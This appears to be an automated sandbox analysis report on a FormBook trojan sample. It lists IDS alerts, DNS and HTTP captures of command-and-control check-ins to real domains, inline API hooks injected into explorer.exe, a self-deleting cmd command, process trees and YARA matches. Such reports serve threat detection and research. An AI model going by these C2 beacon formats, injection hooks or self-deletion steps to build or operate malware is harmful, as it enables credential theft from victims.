IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2d184 | 0x2d200 | de45bd1c65c4bdb8de03d2a9930238c0 | False | 0.7623950398199446 | data | 7.410197142919947 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/18/24-14:45:01.182529 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49716 | 80 | 192.168.2.5 | 35.214.118.179
03/18/24-14:43:58.800885 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49713 | 80 | 192.168.2.5 | 76.223.105.230
03/18/24-14:45:21.823978 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 69.57.172.11
03/18/24-14:45:42.018352 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49718 | 80 | 192.168.2.5 | 34.149.87.45
03/18/24-14:43:40.128238 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49712 | 80 | 192.168.2.5 | 45.88.201.15
03/18/24-14:44:20.094348 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49715 | 80 | 192.168.2.5 | 104.16.36.105
03/18/24-14:46:45.274276 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49720 | 80 | 192.168.2.5 | 3.33.130.190
03/18/24-14:46:05.770153 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49719 | 80 | 192.168.2.5 | 72.14.185.43
                                                            Mar 18, 2024 14:46:45.370978117 CET80497203.33.130.190192.168.2.5
                                                            Mar 18, 2024 14:46:45.372376919 CET4972080192.168.2.53.33.130.190
                                                            Mar 18, 2024 14:46:45.375972986 CET4972080192.168.2.53.33.130.190
                                                            Mar 18, 2024 14:46:45.463438034 CET80497203.33.130.190192.168.2.5
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Mar 18, 2024 14:43:39.361320019 CET5045553192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:43:39.995450020 CET53504551.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:43:58.579144001 CET5727553192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:43:58.707021952 CET53572751.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:44:18.985706091 CET6385853192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:44:19.145958900 CET53638581.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:44:40.094850063 CET5006453192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:44:40.231262922 CET53500641.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:45:00.907357931 CET5806253192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:45:01.017431021 CET53580621.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:45:21.369213104 CET6316653192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:45:21.547061920 CET53631661.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:45:41.735342979 CET6516353192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:45:41.919918060 CET53651631.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:46:04.157180071 CET5018253192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:46:05.597383976 CET53501821.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:46:05.624954939 CET5018253192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:46:05.712866068 CET53501821.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:46:24.469672918 CET5916553192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:46:24.682709932 CET53591651.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:46:45.061707020 CET6069653192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:46:45.184146881 CET53606961.1.1.1192.168.2.5
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49712 | 45.88.201.15 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:43:40.128237963 CET | 169 | OUT | GET /vr01/?F8=w7umpJ+rfj3CGTpHxtSOPW9QQGzAdMNJjdAKE5hb1nYkCdk9PPEgcDhma/h12TSv3owP&K0Dl=8pkho2W8C2 HTTP/1.1
                                                            Host: www.gratiasempirellc.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
Mar 18, 2024 14:43:40.446310043 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.30
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            content-type: text/html; charset=UTF-8
                                                            link: <https://www.gratiasempirellc.com/wp-json/>; rel="https://api.w.org/"
                                                            transfer-encoding: chunked
                                                            date: Mon, 18 Mar 2024 13:43:39 GMT
                                                            server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49713 | 76.223.105.230 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:43:58.800884962 CET | 170 | OUT | GET /vr01/?K0Dl=8pkho2W8C2&F8=afsJSrVtQy935SgvDMKIlJRgvlqACV7EhITZbFrNAvlElQGaJzKQmMA6gaTM16h48AiD HTTP/1.1
                                                            Host: www.laneflowlogistics.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
Mar 18, 2024 14:43:58.908835888 CET | 419 | IN | HTTP/1.1 301 Moved Permanently
                                                            location: https://laneflowlogistics.com/vr01/?K0Dl=8pkho2W8C2&F8=afsJSrVtQy935SgvDMKIlJRgvlqACV7EhITZbFrNAvlElQGaJzKQmMA6gaTM16h48AiD
                                                            vary: Accept-Encoding
                                                            server: DPS/2.0.0+sha-623bf47
                                                            x-version: 623bf47
                                                            x-siteid: us-east-1
                                                            set-cookie: dps_site_id=us-east-1; path=/
                                                            date: Mon, 18 Mar 2024 13:43:58 GMT
                                                            keep-alive: timeout=5
                                                            transfer-encoding: chunked
                                                            connection: close
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49715 | 104.16.36.105 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:44:20.094347954 CET | 170 | OUT | GET /vr01/?F8=kCWTp1EUleadtFJdIzCu6Df5MNzEbmwToUUw4IkBm959jVVvzkoQYbPRGEEyl/3/RaO8&K0Dl=8pkho2W8C2 HTTP/1.1
                                                            Host: www.familyofficesheet.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 18, 2024 14:44:20.196521997 CET  411                IN         HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 18 Mar 2024 13:44:20 GMT
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 18 Mar 2024 14:44:20 GMT
                                                            Location: https://www.familyofficesheet.com/vr01/?F8=kCWTp1EUleadtFJdIzCu6Df5MNzEbmwToUUw4IkBm959jVVvzkoQYbPRGEEyl/3/RaO8&K0Dl=8pkho2W8C2
                                                            Server: cloudflare
                                                            CF-RAY: 8665a825dbc79e08-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            3           192.168.2.5  49716        35.214.118.179  80                1028  C:\Windows\explorer.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Mar 18, 2024 14:45:01.182528973 CET  165                OUT        GET /vr01/?F8=Qr63XqLLwL8kZKZ1R+KG3ClgUrm6jRe21pOgDYnjKSMcuwj3QpCJccHr2dssKI7zl3t9&K0Dl=8pkho2W8C2 HTTP/1.1
                                                            Host: www.flavorfog.online
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 18, 2024 14:45:01.344521046 CET  455                IN         HTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Mon, 18 Mar 2024 13:45:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.flavorfog.online/vr01/?F8=Qr63XqLLwL8kZKZ1R+KG3ClgUrm6jRe21pOgDYnjKSMcuwj3QpCJccHr2dssKI7zl3t9&K0Dl=8pkho2W8C2
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            4           192.168.2.5  49717        69.57.172.11    80                1028  C:\Windows\explorer.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Mar 18, 2024 14:45:21.823977947 CET  177                OUT        GET /vr01/?K0Dl=8pkho2W8C2&F8=3hn83+NBBYNXWUD9Y/r7Xs4IAViW+ZrQ9Q/N09yYT452ZMDcSpE7Ef8yOdRKd9g47dJA HTTP/1.1
                                                            Host: www.bharatcrimecontrol24news.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 18, 2024 14:45:22.885150909 CET  446                IN         HTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            content-type: text/html; charset=UTF-8
                                                            x-redirect-by: WordPress
                                                            location: http://bharatcrimecontrol24news.com/vr01/?K0Dl=8pkho2W8C2&F8=3hn83+NBBYNXWUD9Y/r7Xs4IAViW+ZrQ9Q/N09yYT452ZMDcSpE7Ef8yOdRKd9g47dJA
                                                            content-length: 0
                                                            date: Mon, 18 Mar 2024 13:45:22 GMT
                                                            server: LiteSpeed
                                                            vary: User-Agent


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            5           192.168.2.5  49718        34.149.87.45    80                1028  C:\Windows\explorer.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Mar 18, 2024 14:45:42.018352032 CET  171                OUT        GET /vr01/?F8=0FWlSxHnm0VS79clrGeEzlQTpbLPYM717ItFtF8k1xbK31xxaWzDAorSZVSnHMmj/6/I&K0Dl=8pkho2W8C2 HTTP/1.1
                                                            Host: www.kirtirefrigeration.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 18, 2024 14:45:42.868627071 CET  1139               IN         HTTP/1.1 301 Moved Permanently
                                                            Content-Length: 0
                                                            Location: https://www.kirtirefrigeration.com/vr01?F8=0FWlSxHnm0VS79clrGeEzlQTpbLPYM717ItFtF8k1xbK31xxaWzDAorSZVSnHMmj%2F6%2FI&K0Dl=8pkho2W8C2
                                                            Strict-Transport-Security: max-age=3600
                                                            X-Wix-Request-Id: 1710769542.78026576194612418710
                                                            Age: 0
                                                            Cache-Control: no-cache
                                                            Server: Pepyaka
                                                            X-Content-Type-Options: nosniff
                                                            Accept-Ranges: bytes
                                                            Date: Mon, 18 Mar 2024 13:45:42 GMT
                                                            X-Served-By: cache-iad-kiad7000089-IAD
                                                            X-Cache: MISS
                                                            Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_g
                                                            X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkqHFWhjPEXyPTSLtPMFnp4a0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRaluhXXsY0kzeXc/hv5jOc6IbB2VXGwidGekceXEyeUpsqtvp+HZf/hy20BGHFtztY7w==,2UNV7KOq4oGjA5+PKsX47CaOPCbndCqdyYrCBy15MBQfbJaKSXYQ/lskq2jK6SGP,oeCSbq11YyM2LrWdre0MiAPBzEMPrQyi9uZsFRcWByA=,HQzds2w9GT0wVisn3OaPNtSg+YR3SVhnKJMUEotfkl4=,updaSF0YDozocDRTgMoSRwdxHn63yrlJJYydkEHt/lRLN8IqMAxeDJvk+4e3rd1n8RfI5tGWhNnxpdVR9kbUxg==
                                                            Via: 1.1 google
                                                            glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                            Connection: close


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            6           192.168.2.5  49719        72.14.185.43    80                1028  C:\Windows\explorer.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Mar 18, 2024 14:46:05.770153046 CET  161                OUT        GET /vr01/?K0Dl=8pkho2W8C2&F8=nF7lN0R+GAMQz/Akw9zAFS8sK1vaMqXOBBmwCvkEKDYNrGKPEkcEeMds11lXmHU70D3D HTTP/1.1
                                                            Host: www.topdeals.biz
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 18, 2024 14:46:05.900471926 CET  331                IN         HTTP/1.1 404 Not Found
                                                            server: openresty/1.13.6.1
                                                            date: Mon, 18 Mar 2024 13:46:05 GMT
                                                            content-type: text/html
                                                            content-length: 175
                                                            connection: close
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            7           192.168.2.5  49720        3.33.130.190    80                1028  C:\Windows\explorer.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Mar 18, 2024 14:46:45.274276018 CET  167                OUT        GET /vr01/?K0Dl=8pkho2W8C2&F8=XJpxajiERfwYWZCBMKFPnJULtBnU/CqQJGR7CZrrgovMO9KS90T7etXRllYWrqB0ffTS HTTP/1.1
                                                            Host: www.accidentapp.online
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:


                                                            Code Manipulations

                                                            Function Name  Hook Type  Active in Processes
                                                            PeekMessageA   INLINE     explorer.exe
                                                            PeekMessageW   INLINE     explorer.exe
                                                            GetMessageW    INLINE     explorer.exe
                                                            GetMessageA    INLINE     explorer.exe

                                                            Function Name  Hook Type  New Data
                                                            PeekMessageA   INLINE     0x48 0x8B 0xB8 0x82 0x2E 0xEC
                                                            PeekMessageW   INLINE     0x48 0x8B 0xB8 0x8A 0xAE 0xEC
                                                            GetMessageW    INLINE     0x48 0x8B 0xB8 0x8A 0xAE 0xEC
                                                            GetMessageA    INLINE     0x48 0x8B 0xB8 0x82 0x2E 0xEC


                                                            Target ID:0
                                                            Start time:14:42:39
                                                            Start date:18/03/2024
                                                            Path:C:\Users\user\Desktop\i5NDVAFg42.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\i5NDVAFg42.exe
                                                            Imagebase:0xce0000
                                                            File size:185'856 bytes
                                                            MD5 hash:728B83244A275EF0E29CB00AA0C6692C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:14:42:40
                                                            Start date:18/03/2024
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0x7ff674740000
                                                            File size:5'141'208 bytes
                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000002.00000002.4456590108.000000000E4EB000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:3
                                                            Start time:14:42:42
                                                            Start date:18/03/2024
                                                            Path:C:\Windows\SysWOW64\autochk.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\SysWOW64\autochk.exe
                                                            Imagebase:0x910000
                                                            File size:863'232 bytes
                                                            MD5 hash:FC398299F54290D5F35C69E865FD7CC2
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:14:42:42
                                                            Start date:18/03/2024
                                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                            Imagebase:0xa90000
                                                            File size:29'184 bytes
                                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Target ID:5
                                                            Start time:14:42:45
                                                            Start date:18/03/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del "C:\Users\user\Desktop\i5NDVAFg42.exe"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:14:42:45
                                                            Start date:18/03/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:1.5%
                                                              Dynamic/Decrypted Code Coverage:2.9%
                                                              Signature Coverage:5.9%
                                                              Total number of Nodes:555
                                                              Total number of Limit Nodes:73

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 195 cfa53a-cfa53b 196 cfa53d-cfa53f 195->196 197 cfa501-cfa539 call cfaf60 call 17c2e80 195->197 199 cfa596-cfa5b9 call cfaf60 call 17c2f90 196->199 200 cfa541-cfa556 196->200 203 cfa55c-cfa57d NtAllocateVirtualMemory 200->203 204 cfa557 call cfaf60 200->204 204->203
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00CFB134,?,00000000,?,00003000,00000040,00000000,00000000,00CE9CF3), ref: 00CFA579
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 3abcdc1be25a100d8e90c82018335ced6614c48c47a8e34b9972859f4df0c279
                                                              • Instruction ID: 7efd101a0d680be1a2f77e939a799011784974f1bf73d40b9f7cbb5ddcdb3a77
                                                              • Opcode Fuzzy Hash: 3abcdc1be25a100d8e90c82018335ced6614c48c47a8e34b9972859f4df0c279
